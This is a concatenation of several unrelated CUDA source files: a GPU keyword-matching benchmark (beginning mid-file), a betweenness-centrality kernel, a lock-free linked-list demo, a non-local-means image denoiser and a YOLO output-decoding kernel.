printf("Unable to open the file.\n"); exit(0);} length = 0; while (getc(fp) != EOF) length++; ctext = (char *)malloc(length+4); rewind(fp); for (int l=0; l<length; l++) ctext[l] = getc(fp); for (int l=length; l<length+4; l++) ctext[l] = ' '; fclose(fp); printf("Length : %d\n", length ); // define number of words of text, and set pointers len = length/4; text = (unsigned int *) ctext; // define words for matching words = (unsigned int *)malloc(nwords*sizeof(unsigned int)); for (int w=0; w<nwords; w++) { words[w] = ((unsigned int) keywords[w][0]) + ((unsigned int) keywords[w][1])*(1<<8) + ((unsigned int) keywords[w][2])*(1<<16) + ((unsigned int) keywords[w][3])*(1<<24); } } void deinit(){ free(words); free(text); } void check_matches(int *temp_matches){ bool isRight = true; for(int i = 0; i<NWORDS; i++) { if(matches[i] != temp_matches[i]) { isRight = false; printf("WRONG OUTPUT:\t %s\t|\t%d\n", keywords[i], temp_matches[i]); } } if(isRight) { printf(" - Correct Answer -\n"); } } void print_matches(int *temp_matches){ printf("Printing Matches:\n"); printf("Word\t |\tNumber of Matches\n===================================\n"); for (int i = 0; i < nwords; ++i) printf("%s\t |\t%d\n", keywords[i], temp_matches[i]); } void matchPattern_CPU(unsigned int *text, unsigned int *words, int *matches, int nwords, int length) { unsigned int word; for (int l=0; l<length; l++) { for (int offset=0; offset<4; offset++) { if (offset==0) word = text[l]; else word = (text[l]>>(8*offset)) + (text[l+1]<<(32-8*offset)); for (int w=0; w<nwords; w++){ matches[w] += (word==words[w]); } } } } void exec_CPU(){ // CPU execution const clock_t begin_time = clock(); matchPattern_CPU(text, words, matches, nwords, len); cpuRunTime = (float)( clock() - begin_time ) / CLOCKS_PER_SEC; printf("CPU exec time: %f s\n\n", cpuRunTime); } __global__ void matchPattern_gpu_1(unsigned int *text, unsigned int *words, int *matches, int nwords, int length, int offset_, int which) { int tid = threadIdx.x; int idx = offset_ + blockIdx.x * blockDim.x + tid; // for loading text into the shared memory __shared__ unsigned int text_s[NWORDS + 1]; text_s[tid] = text[idx]; text_s[NWORDS] = text[offset_ + (blockIdx.x * blockDim.x) + blockDim.x]; // loads the keyword for this thread // each thread in a block is reponsible for one keyword unsigned int keyword = words[tid]; __syncthreads(); unsigned int word; int sum = 0; #pragma loop unroll for(int w = 0; w < NWORDS; w++) { #pragma loop unroll for (int offset=0; offset<4; offset++) { word = offset==0 ? text_s[w] : (text_s[w]>>(8*offset)) + (text_s[w+1]<<(32-8*offset)); sum = sum + (word==keyword); } } atomicAdd(&matches[(which*NWORDS)+tid],sum); } // citation: https://github.com/NVIDIA-developer-blog/code-samples/blob/master/series/cuda-cpp/overlap-data-transfers/async.cu void exec_gpu_stream(){ const int nStreams = N_STREAMS; const int streamSize = len / nStreams; const int straming_bytes = streamSize * sizeof(unsigned int); unsigned int *d_text; unsigned int *d_words; int *d_matches; int *h_matches; h_matches = (int *)malloc(nwords*sizeof(int)*N_STREAMS); memset(h_matches, 0, nwords*sizeof(int)*N_STREAMS); cudaStream_t stream[nStreams]; for (int i = 0; i < nStreams; i++){ checkCudaErrors( cudaStreamCreate(&stream[i])); } cudaHostRegister(words,nwords*sizeof(int),0); cudaHostRegister(text,strlen(ctext)*sizeof(char),0); cudaHostRegister(h_matches,nwords*sizeof(int),0); checkCudaErrors(cudaMalloc((void**)&d_words, nwords*sizeof(unsigned int))); checkCudaErrors(cudaMalloc((void**)&d_matches, nwords*sizeof(int)*nStreams)); checkCudaErrors(cudaMalloc((void**)&d_text, sizeof(unsigned int)*len)); cudaEvent_t start, stop; float tiime_ = 0; checkCudaErrors( cudaEventCreate(&start) ); checkCudaErrors( cudaEventCreate(&stop) ); checkCudaErrors( cudaEventRecord(start,0) ); checkCudaErrors(cudaMemcpy(d_words, words, nwords*sizeof(unsigned int), cudaMemcpyHostToDevice)); for (int i = 0; i < nStreams; ++i) { int offset = i * streamSize; checkCudaErrors(cudaMemcpyAsync(&d_text[offset], &text[offset], straming_bytes, cudaMemcpyHostToDevice, stream[i])); } for (int i = 0; i < nStreams; ++i) { int offset = i * streamSize; matchPattern_gpu_1<<<ceil(streamSize/(TITLE_SIZE*NWORDS)), NWORDS, 0, stream[i]>>>(d_text, d_words, d_matches, nwords, len, offset, i); } for (int i = 0; i < nStreams; ++i) { int offset = i * streamSize; checkCudaErrors(cudaMemcpyAsync(&h_matches[(i*NWORDS)], &d_matches[(i*NWORDS)], NWORDS*sizeof(int), cudaMemcpyDeviceToHost, stream[i])); } // cudaMemcpy(h_matches, d_matches, nwords*sizeof(int), cudaMemcpyDeviceToHost); checkCudaErrors( cudaEventRecord(stop, 0) ); checkCudaErrors( cudaEventSynchronize(stop) ); checkCudaErrors( cudaEventElapsedTime(&tiime_, start, stop) ); printf("Time kernel+memory: %fs\n", tiime_/1000); printf("Speedup with memory: %f\n", cpuRunTime/((tiime_)/1000)); for(int w=0; w < NWORDS; w++) { for (int i = 1; i < nStreams; ++i) { h_matches[w] += h_matches[(i*NWORDS) + w]; } } check_matches(h_matches); // cleanup checkCudaErrors( cudaEventDestroy(start) ); checkCudaErrors( cudaEventDestroy(stop) ); for (int i = 0; i < nStreams; ++i) { checkCudaErrors( cudaStreamDestroy(stream[i])); } cudaHostUnregister(text); cudaHostUnregister(words); cudaHostUnregister(h_matches); cudaFree(d_words); cudaFree(d_matches); cudaFree(d_text); } void exec_gpu_simple(){ // GPU execution unsigned int *d_text; unsigned int *d_words; int *d_matches; int *h_matches; h_matches = (int *)malloc(nwords*sizeof(int)); checkCudaErrors(cudaMalloc((void**)&d_words, nwords*sizeof(unsigned int))); checkCudaErrors(cudaMalloc((void**)&d_matches, nwords*sizeof(int))); checkCudaErrors(cudaMalloc((void**)&d_text, sizeof(unsigned int)*len)); cudaEvent_t start,stop; float time_H2D,time_D2H,time_kernel; checkCudaErrors(cudaEventCreate(&start)); checkCudaErrors(cudaEventCreate(&stop)); // MEMCOPY cudaEventRecord(start, 0); checkCudaErrors(cudaMemcpy(d_words, words, nwords*sizeof(unsigned int), cudaMemcpyHostToDevice)); checkCudaErrors(cudaMemcpy(d_text, text, sizeof(unsigned int)*len, cudaMemcpyHostToDevice)); cudaEventRecord(stop,0); cudaEventSynchronize(stop); cudaEventElapsedTime(&time_H2D,start,stop); printf("HostToDevice memcopy time: %fs\n", time_H2D/1000); // RUN KERNEL cudaEventRecord(start, 0); matchPattern_gpu_1<<< ceil((float)len/(TITLE_SIZE*NWORDS)),NWORDS>>>(d_text, d_words, d_matches, nwords, len, 0, 0); cudaEventRecord(stop,0); cudaEventSynchronize(stop); checkCudaErrors(cudaPeekAtLastError()); cudaEventElapsedTime(&time_kernel,start,stop); printf("Kernel execution time: %fs\n", time_kernel/1000); cudaEventRecord(start, 0); checkCudaErrors(cudaMemcpy(h_matches, d_matches, nwords*sizeof(int), cudaMemcpyDeviceToHost)); cudaEventRecord(stop,0); cudaEventSynchronize(stop); cudaEventElapsedTime(&time_D2H,start,stop); printf("DeviceToHost memcopy time: %fs\n", time_D2H/1000); printf("Total memcopy time: %fs\n", (time_D2H+time_H2D)/1000); printf("Total memcopy+kernel time: %fs\n", (time_D2H+time_H2D+time_kernel)/1000); printf("Speedup without memory: %f\n", cpuRunTime/((time_kernel)/1000)); printf("Speedup with memory: %f\n", cpuRunTime/((time_D2H + time_H2D + time_kernel)/1000)); check_matches(h_matches); cudaEventDestroy(start); cudaEventDestroy(stop); free(h_matches); cudaFree(d_words); cudaFree(d_matches); cudaFree(d_text); } int main(int argc, const char **argv) { intialise("./data/small.txt"); exec_CPU(); exec_gpu_stream(); intialise("./data/medium.txt"); exec_CPU(); exec_gpu_stream(); intialise("./data/large.txt"); exec_CPU(); exec_gpu_stream(); deinit(); }
21,466
/* Authors - Dibyadarshan Hota 16CO154 - Omkar Prabhu 16CO233 */ #include <iostream> #include <stdio.h> #include <sstream> #include <string.h> #include <cuda.h> #define ll long long using namespace std; /** * Kernel for computing Betweenness Centrality * res: Stored in global memory variable bc */ __global__ void betweenness_centrality_kernel (int nodes, int *C, int *R, int *d, int *sigma, float *delta, float *bc, int *reverse_stack, int *finish_limit) { // ================================== VARIABLES INIT ============================================ // initial variables __shared__ int position; __shared__ int s; __shared__ int finish_limit_position; // source variable initially 0 int idx = threadIdx.x; if (idx == 0) { s = 0; } __syncthreads(); // move through all nodes while (s < nodes) { __syncthreads(); // ============================== distance, delta and sigma INIT ============================================ for(int v=idx; v<nodes; v+=blockDim.x) { if(v == s) { d[v] = 0; sigma[v] = 1; } else { d[v] = INT_MAX; sigma[v] = 0; } delta[v] = 0; } __syncthreads(); __shared__ int current_depth; __shared__ bool done; if(idx == 0) { done = false; current_depth = 0; position = 0; finish_limit_position = 1; finish_limit[0] = 0; } __syncthreads(); // ============================== Shortest Path Calculation using curr source ====================== // ============================== Using Vertex Parallel ============================================ while(!done) { // wait __syncthreads(); done = true; __syncthreads(); // move through modes for(int v=idx; v<nodes; v+=blockDim.x) { if(d[v] == current_depth) { // add to reverse_stack int t = atomicAdd(&position,1); reverse_stack[t] = v; // move through neighbours for(int r=R[v]; r<R[v+1]; r++) { int w = C[r]; // if not visited if(d[w] == INT_MAX) { d[w] = d[v] + 1; done = false; } // add number of paths if(d[w] == (d[v] + 1)) { atomicAdd(&sigma[w],sigma[v]); } } } } __syncthreads(); // increment variables if(idx == 0){ current_depth++; finish_limit[finish_limit_position] = position; ++finish_limit_position; } } // ============================== BC calculation using Brande's Algorithm ============================================ // Parallel Vertex Parallel implementation // __syncthreads(); if(idx == 0){ finish_limit_position-=2; // printf("%d %d %d<--", finish_limit_position, finish_limit[finish_limit_position], finish_limit[finish_limit_position+1]); // for(int a1=0;a1<=finish_limit_position+1;++a1) printf("%d-", finish_limit[a1]); // printf("\n"); // for(int a1=0;a1<nodes;++a1) printf("%d<", reverse_stack[a1]); // cout<<"\n"; // printf("\n"); } __syncthreads(); //atomicSub(&finish_limit_position,2); for(int itr1 = finish_limit_position; itr1 >= 0; --itr1){ // __syncthreads(); for(int itr2 = finish_limit[itr1] + idx; itr2 < finish_limit[itr1+1]; itr2+=blockDim.x){ // reverse_stack[itr2] is one node for(int itr3 = R[reverse_stack[itr2]]; itr3 < R[reverse_stack[itr2] + 1]; ++itr3){ int consider = C[itr3]; // C[itr3] other node if(d[consider] == d[reverse_stack[itr2]]+1){ //atomicAdd(&delta[consider], ( ((float)sigma[consider]/sigma[reverse_stack[itr2]]) * ((float)1 + delta[reverse_stack[itr2]]) )); delta[reverse_stack[itr2]] += ( ((float)sigma[reverse_stack[itr2]]/sigma[consider]) * ((float)1 + delta[consider]) ); } } if(reverse_stack[itr2] != s){ bc[reverse_stack[itr2]] += delta[reverse_stack[itr2]]; } } __syncthreads(); } // Serialized Vertex Parallel implementation // if(idx == 0){ // for(int itr1 = nodes - 1; itr1 >= 0; --itr1){ // for(int itr2 = R[reverse_stack[itr1]]; itr2 < R[reverse_stack[itr1] + 1]; ++itr2){ // int consider = C[itr2]; // if(d[consider] == d[reverse_stack[itr1]]-1){ // delta[consider] += ( ((float)sigma[consider]/sigma[reverse_stack[itr1]]) * ((float)1 + delta[reverse_stack[itr1]]) ); // } // } // if(reverse_stack[itr1] != s){ // bc[reverse_stack[itr1]] += delta[reverse_stack[itr1]]; // } // } // } // increment __syncthreads(); if (idx == 0) { s += 1; } } } /** * Main function */ int main () { // ================================ READ INPUT AND MAKE Compressed Adjancency List ==================================== // freopen("graph", "r", stdin); // nodes and edges int nodes, edges; cin>>nodes>>edges; // compressed adjancency list int * V = new int[nodes + 1]; int * E = new int[2 * edges]; // read graph data in CSR format string line; int node = 0; int counter = 0; getline(cin, line); for (int i = 0; i < nodes; ++i) { getline(cin, line); V[node] = counter; istringstream is(line); int tmp; while (is >> tmp) { E[counter] = tmp; counter += 1; } ++node; } V[node] = counter; // cout<<"\n"; // for (int i = 0; i <= nodes; i++) { // cout<<V[i]<<" "; // } // cout<<"\n"; // for (int i = 0; i < 2 * edges; ++i) { // cout<<E[i]<<" "; // } // cout<<"\n"; // ================================ DECLARE AND INIT VARIABLES ==================================== int *d = new int[nodes]; int *sigma = new int[nodes]; float *delta = new float[nodes]; float *bc = new float[nodes]; memset(bc,0,sizeof(bc)); int *d_d, *d_sigma, *d_V, *d_E, *d_reverse_stack, *d_end_point; float *d_delta, *d_bc; cudaMalloc((void**)&d_d, sizeof(int) * nodes); cudaMalloc((void**)&d_end_point, sizeof(int) * (nodes + 1)); cudaMalloc((void**)&d_sigma, sizeof(int) * nodes); cudaMalloc((void**)&d_reverse_stack, sizeof(int) * nodes); cudaMalloc((void**)&d_V, sizeof(int) * (nodes + 1)); cudaMalloc((void**)&d_E, sizeof(int) * (2*edges)); cudaMalloc((void**)&d_delta, sizeof(float) * nodes); cudaMalloc((void**)&d_bc, sizeof(float) * nodes); cudaMemcpy(d_V, V, sizeof(int) * (nodes+1), cudaMemcpyHostToDevice); cudaMemcpy(d_E, E, sizeof(int) * (2*edges), cudaMemcpyHostToDevice); cudaMemcpy(d_bc, bc, sizeof(float) * (nodes), cudaMemcpyHostToDevice); // cudaMemcpy(d_delta, delta, sizeof(float) * (nodes), cudaMemcpyHostToDevice); // ================================ KERNEL PARAMS AND CALL ==================================== float elapsed_time; cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); cudaEventRecord(start, 0); // kernel call betweenness_centrality_kernel <<<1, 1024>>> (nodes, d_E, d_V, d_d, d_sigma, d_delta, d_bc, d_reverse_stack, d_end_point); cudaEventRecord(stop, 0); cudaEventSynchronize(stop); cudaEventElapsedTime(&elapsed_time, start, stop); // ================================ RESULT ==================================== // cudaMemcpy(d, d_d, sizeof(float) * nodes, cudaMemcpyDeviceToHost); // cudaMemcpy(sigma, d_sigma, sizeof(float) * nodes, cudaMemcpyDeviceToHost); cudaMemcpy(bc, d_bc, sizeof(float) * nodes, cudaMemcpyDeviceToHost); // cudaMemcpy(delta, d_delta, sizeof(float) * nodes, cudaMemcpyDeviceToHost); cout<<"Result: \n"; // for (int i = 0; i < nodes; i++) { // cout<<"Node: "<<i<<" BC: "<<fixed<<setprecision(6)<<bc[i]/2.0<<"\n"; // } cout<<"\n"; // Print the time for execution cout<<"Execution time: "<<elapsed_time/1000.0<<endl; // Maximum BC value float max_bc = 0.0; for (int i = 0; i < nodes; ++i) { max_bc = (bc[i] > max_bc) ? bc[i] : max_bc; } cout<<"Max BC value: "<<max_bc/2.0<<endl; // ================================ MEMORY RELEASE ==================================== cudaFree(d_sigma); cudaFree(d_d); cudaFree(d_V); cudaFree(d_E); cudaFree(d_delta); cudaFree(d_bc); cudaFree(d_reverse_stack); cudaFree(d_end_point); free(E); free(V); free(d); free(sigma); free(delta); free(bc); return 0; }
21,467
#include <stdio.h> #include <cuda.h> struct node { int data; struct node *next; }; __device__ struct node *head; __device__ struct node *getNewNode() { unsigned id = blockIdx.x * blockDim.x + threadIdx.x; struct node *newnode = (struct node *)malloc(sizeof(struct node)); newnode->data = id; newnode->next = NULL; return newnode; } __global__ void listAdd() { struct node *myoldhead, *actualoldhead; struct node *newnode = getNewNode(); do { myoldhead = head; newnode->next = myoldhead; actualoldhead = (struct node *)atomicCAS((unsigned long long *)&head, (unsigned long long)myoldhead, (unsigned long long)newnode); } while (actualoldhead != myoldhead); } __device__ void listPrint(struct node *ptr) { printf("%d ", ptr->data); } __global__ void listPrint() { int nnodes = 0; for (struct node *ptr = head; ptr; ptr = ptr->next, ++nnodes) listPrint(ptr); printf("\nNumber of nodes = %d\n", nnodes); } int main() { cudaMemset(&head, 0, sizeof(struct node *)); listAdd<<<4, 1024>>>(); listPrint<<<1, 1>>>(); cudaDeviceSynchronize(); return 0; }
21,468
#include <stdio.h> #include <cuda.h> #include <cuda_runtime.h> #include <curand_kernel.h> #include <stdlib.h> #include <math.h> #include <sys/time.h> #include <time.h> #include <string.h> #define PI 3.1415926536 #define e 2.718281828459 #define N 64*64 #define PATCH 3 #define RADIUS (PATCH-1)/2 #define THREADS_PER_BLOCK 64 struct timeval tic(){ struct timeval tv; gettimeofday(&tv,NULL); return tv; } typedef struct Patches { int index; float central; float* patchArray; }Patch; double toc(struct timeval begin){ struct timeval end; gettimeofday(&end,NULL); double stime = ((double)(end.tv_sec-begin.tv_sec)*1000)+((double)(end.tv_usec-begin.tv_usec)/1000); stime = stime / 1000; return (stime); } float* readFile(int n, int m, char *file_path){ FILE* ptrFile = fopen(file_path, "r"); float *I = (float*)malloc(n*m*sizeof(float)); if (!ptrFile){ printf("Error Reading File\n"); exit (0); } for(int i=0; i<n; i++){ for(int j=0; j<m; j++){ fscanf(ptrFile,"%f,", &I[n*i+j]); } } fclose(ptrFile); return I; } void toTXT(float* array,char *output, int n, int m){ FILE *fp; fp=fopen(output,"w"); for(int i=0; i<n; i++){ for(int j=0; j<m; j++){ if(j<m-1){ fprintf(fp,"%lf,",array[n*i+j]); }else if(j==m-1){ fprintf(fp,"%lf",array[n*i+j]); } } fprintf(fp,"\n",array[n*i]); } fclose(fp); printf("File %s saved.\n", output); } __global__ void normalization(float* A, float* B, float min, float max){ int i = blockIdx.x * blockDim.x + threadIdx.x; if(i<N) B[i] = (A[i] - min) / max; } float AWGN_generator() //https://www.embeddedrelated.com/showcode/311.php {/* Generates additive white Gaussian Noise samples with zero mean and a standard deviation of 1. */ float dev = 0.03162; //var = 0.01 float temp1; float temp2; float result; int p = 1; while( p > 0 ) { temp2 = ( rand() / ( (float)RAND_MAX ) ); /* rand() function generates an integer between 0 and RAND_MAX, which is defined in stdlib.h. */ if ( temp2 == 0 ) {// temp2 is >= (RAND_MAX / 2) p = 1; }// end if else {// temp2 is < (RAND_MAX / 2) p = -1; }// end else }// end while() temp1 = cos( ( 2.0 * (float)PI ) * rand() / ( (float)RAND_MAX ) ); result = sqrt( -2.0 * log( temp2 ) ) * temp1; return result * dev; // return the generated random sample to the caller }// end AWGN_generator() Patch* makePatches(float* J, int n, int m, Patch* allPatches, int patchSizeH, int patchSizeW){ int mdW = (patchSizeW - 1)/2; int mdH = (patchSizeH - 1)/2; for(int i=0; i<n; i++){ for(int j=0; j<m; j++){ for(int w=0; w<patchSizeW; w++){ for(int h=0; h<patchSizeH; h++){ allPatches[n*j+i].patchArray[patchSizeH*w+h] = 0; } } allPatches[n*j+i].central = J[n*j+i]; allPatches[n*j+i].index = n*j+i; if(i==0 && j==0){ for(int w=mdW; w<patchSizeW; w++){ for(int h=mdH; h<patchSizeH; h++){ allPatches[n*j+i].patchArray[patchSizeH*w+h] = J[(n*j+i)-(mdW-w)*n-(mdH-h)]; } } }else if(i>0 && j==0){ for(int h=0; h<patchSizeH-1; h++){ for(int w=0; w<patchSizeW; w++){ allPatches[n*j+i].patchArray[patchSizeH*w+h] = allPatches[n*j+(i-1)].patchArray[patchSizeH*w+(h+1)]; } } for(int w=mdW; w<patchSizeW; w++){ if((n-1-i) >= mdH){ allPatches[n*j+i].patchArray[patchSizeH*w+(patchSizeH-1)] = J[(n*j+i)-(mdW-w)*n+mdH]; }else if((n-1-i) < mdH){ allPatches[n*j+i].patchArray[patchSizeH*w+(patchSizeH-1)] = 0; } } }else if(j>0){ for(int w=0; w<patchSizeW-1; w++){ for(int h=0; h<patchSizeH; h++){ allPatches[n*j+i].patchArray[patchSizeH*w+h] = allPatches[n*(j-1)+i].patchArray[patchSizeH*(w+1)+h]; } } int a,b; if(i>=mdH && (n-1-i)>=mdH){ a = 0; b = patchSizeH; }else if(i<mdH && (n-1-i)>=mdH){ a = mdH - i; b = patchSizeH; }else if(i<mdH && (n-1-i)<mdH){ a = mdH - i; b = mdH + (n-i); }else if(i>=mdH && (n-1-i)<mdH){ a = 0; b = mdH + (n-i); } for(int h=a; h<b; h++){ if((m-1-j) >= mdW){ allPatches[n*j+i].patchArray[patchSizeH*(patchSizeW-1)+h] = J[(n*j+i)+mdW*n-(mdH-h)]; }else if((m-1-j) < mdW){ allPatches[n*j+i].patchArray[patchSizeH*(patchSizeW-1)+h] = 0; } } } } } return allPatches; } float* computeG_a(int patchSizeH, int patchSizeW, float patchSigma){ float* gauss = (float*)malloc(patchSizeH*patchSizeW*sizeof(float)); float max = -1.0; for (int i = 0; i < patchSizeH; i++) { for (int j = 0; j < patchSizeW; j++) { float y = i - (patchSizeH - 1) / 2.0; float x = j - (patchSizeW - 1) / 2.0; gauss[patchSizeW*i+j] = (1/2.0) * exp(-(x * x + y * y) / (2.0 * PI * patchSigma * patchSigma)); } } return gauss; } __global__ void dist(float *W,float *p_i, int i, float *A, float *V, int n, int patchSizeH, float filtSigma){ float d=0; int sizeofRow = n + 2*RADIUS; int k = blockIdx.x * blockDim.x + threadIdx.x; int index = threadIdx.x; __shared__ float d_o; __shared__ float sh_gauss[PATCH*PATCH]; extern __shared__ float sh_A[]; for(int v=0; v<patchSizeH*patchSizeH; v++){ sh_gauss[v] = V[v]; } int x = k/n + RADIUS; int y = k%n + RADIUS; int indexX = index/n; int indexY = index%n; if(k<N){ sh_A[sizeofRow*(RADIUS+indexX) + (RADIUS+indexY)] = A[sizeofRow*x+y]; if(indexX<RADIUS && indexY<RADIUS){ sh_A[sizeofRow*indexX + indexY] = A[sizeofRow*(x-RADIUS) + (y-RADIUS)]; sh_A[sizeofRow*(indexX+RADIUS+1) + (RADIUS+n+ indexY)] = A[sizeofRow*(x+n) + (y+n)]; }else if(indexY<RADIUS){ sh_A[sizeofRow*(indexX+RADIUS) + indexY] = A[sizeofRow*x + (y-RADIUS)]; sh_A[sizeofRow*indexX + (indexY+n)] = A[sizeofRow*x + (y+n)]; }else if(indexX<RADIUS){ sh_A[sizeofRow*indexX + (indexY+RADIUS)] = A[sizeofRow*(x-RADIUS) + y]; sh_A[sizeofRow*(indexX+RADIUS+1) + (indexY+RADIUS)] = A[sizeofRow*(x+n) + y]; } } __syncthreads(); if(i/THREADS_PER_BLOCK == blockIdx.x){ int thr = i%THREADS_PER_BLOCK; //the coordinates of i in the block int x = thr/n; int y = thr%n; for (int r = 0; r < patchSizeH; r++) { for(int c=0; c<patchSizeH; c++){ d += sh_gauss[patchSizeH*r+c] * powf(sh_A[(x*n+y)+n*r+c] - sh_A[(indexX*n+indexY)+n*r+c],2); } } }else{ for (int r = 0; r < patchSizeH; r++) { for(int c=0; c<patchSizeH; c++){ d += sh_gauss[patchSizeH*r+c] * powf(p_i[n*r+c] - sh_A[(indexX*n+indexY)+n*r+c],2); } } } d = sqrt(d); W[k] = exp(-pow(d,2) / filtSigma); d=0; } __global__ void dim(float *w, float *z){ int i = blockIdx.x * blockDim.x + threadIdx.x; if(i<N){ w[i] = w[i] / *z; } } int main(int argc, char *argv[]){ int n = atoi(argv[1]); int m = atoi(argv[2]); int patchSizeH = atoi(argv[3]); int patchSizeW = atoi(argv[4]); float patchSigma =5/3; float filtSigma =0.01 ; char* file_path; file_path=(char*)malloc(strlen(argv[5])*sizeof(char)); memcpy(file_path,argv[5],strlen(argv[5])); int size = N * sizeof(float); int sizePatch = patchSizeH * patchSizeW * sizeof(float); int pSize = patchSizeH * patchSizeW; int s = n+(patchSizeH-1); int sA = s*s; float *I, *I_norm, *J, *If; float *dev_I, *dev_I_norm, *dev_J, *dev_gauss; float *P, *w; float *A = (float*)malloc(sA*sizeof(float)); //allocate memory for device copies cudaMalloc(&dev_I, size); cudaMalloc(&dev_I_norm, size); cudaMalloc(&dev_J, size); cudaMalloc(&dev_gauss, sizePatch); I = (float*)malloc(size); I_norm = (float*)malloc(size); J = (float*)malloc(size); If = (float*)malloc(size); Patch* allPatches; allPatches = (Patch*)malloc(n*m*sizeof(Patch)); for(int i=0; i<n; i++){ for(int j=0; j<m; j++){ allPatches[n*j+i].patchArray = (float*)malloc(patchSizeH*patchSizeW*sizeof(float)); } } w = (float*)malloc(N*N*sizeof(float)); float* gauss = (float*)malloc(sizePatch); float* Z = (float*)malloc(size); struct timeval tStart; I = readFile(n,m,file_path); //find min of 'I' and max of 'I-min' float min = INFINITY; float max = -1.0; for(int i=0; i<n; i++){ for(int j=0; j<m; j++){ if(I[n*i+j]<min) min= I[n*i+j]; } } for(int i=0; i<n*m; i++){ if((I[i]-min)>max) max = I[i]-min; } cudaMemcpy(dev_I, I, size, cudaMemcpyHostToDevice); normalization<<<N/THREADS_PER_BLOCK,THREADS_PER_BLOCK>>>(dev_I, dev_I_norm, min, max); cudaMemcpy(I_norm, dev_I_norm, size, cudaMemcpyDeviceToHost); for(int i=0; i<n*m; i++){ J[i] = I_norm[i] + AWGN_generator(); } toTXT(I_norm,"normShared.txt",n,m); toTXT(J,"JShared.txt",n,m); // A : extended J array with zeros all around for(int i=0; i<s; i++){ for(int j=0; j<(patchSizeH-1)/2; j++){ A[s*j+i] = 0; } for(int j=0; j<(patchSizeH-1)/2; j++){ A[s*(n+(patchSizeH-1)/2)*j+i] = 0; } for(int j=0; j<(patchSizeH-1)/2; j++){ A[((patchSizeH-1)/2)*i+j] = 0; } for(int j=n+(patchSizeH-1)/2; j<s;j++){ A[((patchSizeH-1)/2)*i+j] = 0; } } for(int i=0; i<n; i++){ for(int j=0; j<n; j++){ A[((patchSizeH-1)/2)*s+s*i+(patchSizeH-1)/2+j] = J[n*i+j]; } } allPatches = makePatches(J,n,m,allPatches,patchSizeH,patchSizeW); P = (float*)malloc(N*pSize*sizeof(float)); for(int i=0; i<N; i++){ for(int j=0; j<pSize; j++){ P[pSize*i+j] = allPatches[i].patchArray[j]; } } float *dev_A; cudaMalloc(&dev_A, sA*sizeof(float)); cudaMemcpy(dev_A, A, sA*sizeof(float), cudaMemcpyHostToDevice); gauss = computeG_a(patchSizeH, patchSizeW, patchSigma); cudaMemcpy(dev_gauss, gauss, sizePatch, cudaMemcpyHostToDevice); float *patch_i = (float*)malloc(sizePatch); float *dev_patchI; cudaMalloc(&dev_patchI, sizePatch); float *wi_j = (float*)malloc(N*sizeof(float)); float *dev_wij; cudaMalloc(&dev_wij, N*sizeof(float)); tStart = tic(); for(int i=0; i<N; i++){ for(int j=0; j<pSize; j++){ patch_i[j] = P[pSize*i +j]; } cudaMemcpy(dev_patchI, patch_i, sizePatch, cudaMemcpyHostToDevice); size_t size_shared = s*patchSizeH*sizeof(float); dist<<<N/THREADS_PER_BLOCK,THREADS_PER_BLOCK,size_shared>>>(dev_wij, dev_patchI,i,dev_A, dev_gauss,n,patchSizeH,filtSigma); cudaMemcpy(wi_j, dev_wij, size, cudaMemcpyDeviceToHost); for(int j=0; j<N;j++){ Z[i] += wi_j[j]; w[N*i+j] = wi_j[j]; } } double time = toc(tStart); float *dev_Z; cudaMalloc(&dev_Z, sizeof(float)); for(int i=0; i<N; i++){ for(int j=0; j<N;j++){ wi_j[j] = w[N*i+j]; } cudaMemcpy(dev_wij, wi_j,size, cudaMemcpyHostToDevice); cudaMemcpy(dev_Z, &Z[i], sizeof(float), cudaMemcpyHostToDevice); dim<<<N/THREADS_PER_BLOCK,THREADS_PER_BLOCK>>>(dev_wij,dev_Z); cudaMemcpy(wi_j, dev_wij, size,cudaMemcpyDeviceToHost); for(int j=0; j<N;j++){ w[N*i+j] = wi_j[j]; If[i] += w[N*i+j] * J[j]; } } toTXT(If,"IfShared.txt",n,m); // float *x = (float*)malloc(N*sizeof(float)); // for(int i=0; i<N; i++){ // for(int j=0; j<N; j++){ // x[i] += w[N*i+j]; // } // } // for(int i=0; i<50; i++){ // printf("%f ", x[i]); // } float* Dif = (float*)malloc(N*sizeof(float)); for(int i=0; i<N; i++){ Dif[i] =If[i] - J[i] ; } toTXT(Dif,"DifShared.txt",n,m); printf("Time: %f sec", time); cudaFree(dev_I); cudaFree(dev_I_norm); cudaFree(dev_J); cudaFree(dev_gauss); cudaFree(dev_patchI); cudaFree(dev_wij); cudaFree(dev_A); free(I); free(I_norm); free(J); free(patch_i); free(gauss); free(wi_j); free(Z); free(If); free(A); return 0; }
21,469
#include "includes.h" __device__ float sigmoid(float data){ return 1./(1. + expf(-data)); }; __global__ void yoloKernel(const int n,const float * input, float* output, const int* anchors,int anchor_num, int classes,int height,int width,float down_stride,float thresh){ const int idx = blockIdx.x * blockDim.x + threadIdx.x; if(idx >= n) return; extern __shared__ int shared_anchors[]; if(threadIdx.x < anchor_num*2){ shared_anchors[threadIdx.x] = anchors[threadIdx.x]; } __syncthreads(); int row = idx % width; int col = (idx / width) % height; int anchor_id = (idx / width / height)% anchor_num; int batch_id = idx/width/height/anchor_num; int C = anchor_num*(classes+5); int stride = width*height; int begin_id = ((batch_id * C + anchor_id*(classes + 5))*height+col)*width+row; float conf_prob =sigmoid(input[begin_id + 4*stride]); if(conf_prob > thresh) { int class_id = -1; float max_prob = thresh; for (int c = 0;c<classes;++c){ int cls_id = begin_id + stride*(c + 5); float cls_prob = sigmoid(input[cls_id]) *conf_prob ; if(cls_prob > max_prob){ max_prob = cls_prob; class_id = c; } } if(class_id >= 0){ int resCount = (int)atomicAdd(output,1); float * data = output + 1 + resCount*7; // x1,y1,x2,y2,cls,conf,batch_id data[0] = (row + sigmoid(input[begin_id]))*down_stride; data[1] = (col + sigmoid(input[begin_id+stride]))*down_stride; data[2] = expf(input[begin_id+2*stride]) * (float)shared_anchors[2*anchor_id]; data[3] = expf(input[begin_id+3*stride]) * (float)shared_anchors[2*anchor_id + 1]; data[4] = class_id; data[5] = max_prob; data[6] = batch_id; } } }
21,470
